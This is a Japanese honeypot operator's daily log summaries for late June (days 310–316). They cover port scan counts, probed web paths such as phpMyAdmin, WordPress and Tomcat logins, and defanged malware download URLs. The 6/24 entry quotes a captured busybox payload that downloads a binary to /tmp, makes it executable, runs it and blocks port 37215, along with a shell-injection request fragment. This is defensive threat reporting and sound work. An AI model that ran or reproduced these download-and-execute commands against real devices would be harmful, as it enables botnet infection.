【ハニーポット簡易分析】Honeypot簡易分析(316日目:6/29)
Honeypot簡易分析(316日目:6/29)となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 803 | -2860 |
23 | telnet | 396 | -1043 |
2222 | unreg-ab2 | 249 | 228 |
5900 | vnc | 85 | -4914 |
20000 | Unknown | 73 | 69 |
23399 | Unknown | 44 | 29 |
3312 | appman-server | 44 | 27 |
3331 | mcs-messaging | 44 | 20 |
3372 | tip2 | 44 | 22 |
3338 | anet-b | 42 | 18 |
<新規マルウェアダウンロード>
なし
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
target | CVE | reference | count | |
---|---|---|---|---|
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 24 |
/ | - | - | - | 18 |
hxxp://110[.]249[.]212[.]46/testget | Unauthorized Relay | - | - | 2 |
hxxp://www[.]baidu[.]com/ | Unauthorized Relay | - | - | 1 |
www[.]baidu[.]com:443 | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
なし
<マルウェアダウンロード>
なし
以上となります。
【ハニーポット簡易分析】Honeypot簡易分析(315日目:6/28)
Honeypot簡易分析(315日目:6/28)となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 2670 | -1032 |
23 | telnet | 798 | -679 |
5900 | vnc | 629 | -4363 |
33398 | Unknown | 77 | 65 |
3333 | dec-notes | 75 | 47 |
3346 | trnsprntproxy | 75 | 50 |
53399 | Unknown | 75 | 60 |
63381 | Unknown | 75 | 63 |
23395 | Unknown | 74 | 62 |
3304 | opsession-srvr | 74 | 49 |
<新規マルウェアダウンロード>
なし
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
path | target | CVE | reference | count |
/ | - | - | - | 28 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 25 |
hxxp://110[.]249[.]212[.]46/testget | Unauthorized Relay | - | - | 7 |
/TP/public/index.php | ThinkPHP | - | - | 3 |
/MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/favicon.ico | - | - | - | 1 |
/myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
hxxp://5[.]188[.]210[.]101/echo.php | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
なし
【ハニーポット簡易分析】Honeypot簡易分析(314日目:6/27)
Honeypot簡易分析(314日目:6/27)となります。
◾️Honeytrap
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 3359 | -326 |
23 | telnet | 1231 | -249 |
5900 | vnc | 732 | -4258 |
3306 | mysql | 359 | 135 |
13396 | Unknown | 98 | 89 |
3372 | tip2 | 94 | 75 |
3321 | vnsstr | 93 | 75 |
33940 | Unknown | 93 | 82 |
53399 | Unknown | 93 | 82 |
23395 | Unknown | 92 | 84 |
<新規マルウェアダウンロード>
マルウェア | ペイロード(抜粋) |
157[.]230[.]173[.]232 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
アクセスしてみると以下の文字列が表示されていました。
six runs your family
おそらく、マルウェアのダウンロード先もアクセスできる時間を短時間に設定していると思われます。通信先のレピテーション情報でブロックする運用は難しいのかもしれません。マルウェアはペイロードから推測するとCoinMiner系のマルウェアではないかと思われます。
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
<新規検知パス一覧>
path | target | CVE | reference | count |
---|---|---|---|---|
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 22 |
/ | - | - | - | 20 |
hxxp://110.249.212.46/testget | Unauthorized Relay | - | - | 4 |
/MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/index.php | - | - | - | 1 |
/myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
<新規検知パス一覧>
なし
<マルウェアダウンロード>
なし
なし
以上となります。
【ハニーポット簡易分析】Honeypot簡易分析(313日目:6/26)
Honeypot簡易分析(313日目:6/26)となります。
これと言った検知は特にありませんでした。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 4096 | 428 |
23 | telnet | 1370 | -112 |
5900 | vnc | 1055 | -3928 |
3424 | Unknown | 748 | 700 |
3335 | directv-soft | 132 | 117 |
3338 | anet-b | 131 | 106 |
3314 | uohost | 130 | 116 |
33902 | Unknown | 130 | 125 |
43389 | Unknown | 130 | 123 |
53397 | Unknown | 130 | 123 |
<新規マルウェアダウンロード>
マルウェア | ペイロード(抜粋) |
hxxp://68[.]183[.]39[.]48/icy[.]sh | POST /UD/?9 HTTP/1.1 |
hxxp://185[.]99[.]254[.]29/bins/mpsl | CNXN............M. |
hxxp://185[.]99[.]254[.]29/bins/x86 | CNXN............M. |
hxxp://185[.]99[.]254[.]29/bins/arm7 | CNXN............M. |
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
path | target | CVE | reference | count |
/ | - | - | - | 31 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 24 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
/shell | Webshell | - | - | 1 |
/test// | WordPress | - | - | 1 |
/test//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/test/wp-login.php | WordPress | - | - | 1 |
/wp2// | WordPress | - | - | 1 |
/wp2//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/wp2/wp-login.php | WordPress | - | - | 1 |
/wp3// | WordPress | - | - | 1 |
/wp3//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/wp3/wp-login.php | WordPress | - | - | 1 |
hxxp://110.249.212.46/testget | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
なし
以上となります。
【ハニーポット簡易分析】Honeypot簡易分析(312日目:6/25)
Honeypot簡易分析(312日目:6/25)となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 4043 | 408 |
23 | telnet | 1640 | 171 |
3424 | Unknown | 959 | 943 |
5900 | vnc | 500 | -4477 |
13380 | Unknown | 102 | 100 |
3333 | dec-notes | 100 | 74 |
3352 | ssql | 100 | 87 |
33940 | Unknown | 100 | 96 |
33963 | Unknown | 100 | 96 |
3371 | Unknown | 99 | 97 |
<新規マルウェアダウンロード>
マルウェア | ペイロード例 |
hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | POST /tmUnblock.cgi HTTP/1.1 |
lsd[.]systemten[.]org | PUT /fileserver/go.txt HTTP/1.1 |
178[.]62[.]114[.]122 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh | GET /shell? |
103[.]83[.]157[.]41 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
hxxp://185[.]244[.]25[.]241/k | CNXN............M.... |
hxxp:/\/185[.]244[.]25[.]241/b/arm7 | GET /shell |
hxxp://87[.]120[.]254[.]184/curl1 | CNXN............M.... |
89[.]190[.]159[.]189 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
◾️WoWHoneeypot
<国別検知数および検知数>
一部増加していますが、phpmyadminの調査行為を多く検知していることが原因です。
<検知パス一覧>
<検知パス一覧>
path | target | CVE | reference | count |
/ | - | - | - | 30 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 24 |
/HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
/admin/ | - | - | - | 1 |
/blog// | WordPress | - | - | 1 |
/blog//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/blog/wp-login.php | WordPress | - | - | 1 |
/dbadmin/ | phpMyAdmin | - | - | 1 |
/forum// | WordPress | - | - | 1 |
/forum//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/forum/wp-login.php | WordPress | - | - | 1 |
/main.php | - | - | - | 1 |
/myadmin/ | phpMyAdmin | - | - | 1 |
/phpMyAdmin/ | phpMyAdmin | - | - | 1 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/phpmyadmin/ | phpMyAdmin | - | - | 1 |
/pma/ | phpMyAdmin | - | - | 1 |
/wp// | WordPress | - | - | 1 |
/wp//wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/wp/wp-login.php | WordPress | - | - | 1 |
<新規検知パス一覧>
path | target | CVE | reference |
/Login.htm | - | - | - |
/PMA/ | PhpMyAdmin | - | - |
/PMA2005/ | PhpMyAdmin | - | - |
/SQLite/main.php | SQLiteManager | - | - |
/SQLiteManager-1.2.4/main.php | SQLiteManager | - | - |
/SQLiteManager/main.php | SQLiteManager | - | - |
/SQlite/main.php | SQLiteManager | - | - |
/agSearch/SQlite/main.php | SQLiteManager | - | - |
/hudson/script | Unknown | - | - |
/mysql-admin/ | PhpMyAdmin | - | - |
/mysql/ | PhpMyAdmin | - | - |
/mysqladmin/ | PhpMyAdmin | - | - |
/mysqlmanager/ | PhpMyAdmin | - | - |
/nagiosxi/images/loginsplash.png | PhpMyAdmin | - | - |
/openserver/phpmyadmin/ | PhpMyAdmin | - | - |
/p/m/a/ | PhpMyAdmin | - | - |
/php-my-admin/ | PhpMyAdmin | - | - |
/php-myadmin/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.2.3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.2.6/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.4/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.5-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.5-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.5-rc2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.5/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.6-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.6-rc2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.6/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.7-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.5.7/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-alpha/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-alpha2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-beta1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-beta2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.0/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1-rc2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.2-beta1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.2-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.2-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.3-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.3-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl4/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.6.4/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.7.0-beta1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.7.0-pl1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.7.0-pl2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.7.0-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.7.0/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0-beta1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0-rc2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0.1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0.2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0.3/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0.4/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.0/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.1-rc1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.1/ | PhpMyAdmin | - | - |
/phpMyAdmin-2.8.2/ | PhpMyAdmin | - | - |
/phpMyAdmin-2/ | PhpMyAdmin | - | - |
/phpMyAdmin2/ | PhpMyAdmin | - | - |
/phpmanager/ | PhpMyAdmin | - | - |
/phpmy-admin/ | PhpMyAdmin | - | - |
/phpmyadmin2/ | PhpMyAdmin | - | - |
/pma2005/ | PhpMyAdmin | - | - |
/script | - | - | - |
/sqlite/main.php | SQLiteManager | - | - |
/sqlitemanager/main.php | SQLiteManager | - | - |
/sqlmanager/ | SQLiteManager | - | - |
/sqlweb/ | SQL | - | - |
/systemInfo | Unknown | - | - |
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php | SQLiteManager | - | - |
/webadmin/ | SQL | - | - |
/webdb/ | SQL | - | - |
/websql/ | SQL | - | - |
【ハニーポット簡易分析】Honeypot簡易分析(311日目:6/24)
Honeypot簡易分析(311日目:6/24)となります。
Honeytrapは7:00以降のものが取得しているため、それ以降の分析となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
110 | pop3 | 28972 | 28967 |
445 | smb | 3332 | -307 |
23 | telnet | 1372 | -75 |
3306 | mysql | 406 | 175 |
5900 | vnc | 246 | -4754 |
3424 | 109 | 97 | |
123 | ntp | 77 | 75 |
3389 | rdp | 71 | -226 |
3343 | ms-cluster-net | 50 | 40 |
3322 | 47 | 37 |
<新規マルウェアダウンロード>
マルウェア | ペイロード例 |
hxxp:/\/185[.]244[.]25[.]241/b/arm7 | GET /shell?cd%20/tmp;wget%20 |
hxxp://185[.]244[.]25[.]241/k | CNXN............ |
89[.]190[.]159[.]189 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | POST /tmUnblock.cgi HTTP/1. |
hxxp://185[.]244[.]25[.]24/k | CNXN........... |
178[.]62[.]114[.]122 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
特に新たな脆弱性による検知はなく、IoT系の脆弱性を狙ったものが多い検知でした。
実行後は該当のポートからの通信を遮断するような文字列も確認できました。他の攻撃者からの攻撃を防ぐことが目的と思われます。
実行後は該当のポートからの通信を遮断するような文字列も確認できました。他の攻撃者からの攻撃を防ぐことが目的と思われます。
BODY部例:
/bin/busybox wget -g xxx.xxx.xxx.xxx -l /tmp/vt -r /bins/element.mips;
/bin/busybox chmod 777 /tmp/vt;
/tmp/vt huawei.mips;
/bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
path |
target | CVE | reference | count |
/wp-login.php | WordPress | - | - | 96 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 26 |
/ | - | - | - | 23 |
/index.php | - | - | - | 2 |
/phpmyadmin/index.php | phpMyAdmin | - | - | 2 |
/// | - | - | - | 1 |
///wp-json/wp/v2/users/ | WordPress | - | - | 1 |
/ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
hxxp://112[.]35[.]63[.]31:8088/index.php | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
path |
payload | count |
/site/.env | GET /site/.env HTTP/1.1.User-Agent: curl/7.35.0 | 1 |
【ハニーポット簡易分析】Honeypot簡易分析(310日目:6/23)
HoneytrapのログがなぜかSplunkで認識されず、困ってます。ちょっと、原因が分かるまでHoneytrapの分析はお休みになるかもしれません。。。
Honeypot簡易分析(310日目:6/23)
◾️WoWHoneeypot
<国別検知数および検知数>
検知が増加していますが、Tomcatの不正認証を狙ったものとなります。ユーザ名はいつもの通りのものとなります。
<検知パス一覧>
<新規検知パス一覧>
認証(ユーザ名) | 検知数 |
---|---|
admin | 1027 |
tomcat | 1027 |
root | 1026 |
<検知パス一覧>
path | target | CVE | reference | count |
/manager/html | Tomcat | - | - | 3081 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 25 |
/ | - | - | - | 24 |
/TP/public/index.php | ThinkPHP | - | - | 6 |
hxxp://110[.]249.212.46/testget | Unauthorized Relay | - | - | 2 |
/.well-known/security.txt | SSL certificate | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 | 1 |
/favicon.ico | - | - | - | 1 |
/index.php | - | - | - | 1 |
/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpmy/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
/sitemap.xml | xml sitemap | - | - | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 1 |
/web/.env | .env file | - | - | 1 |
<新規検知パス一覧>
検知パスは特に変わったものはありませんでした。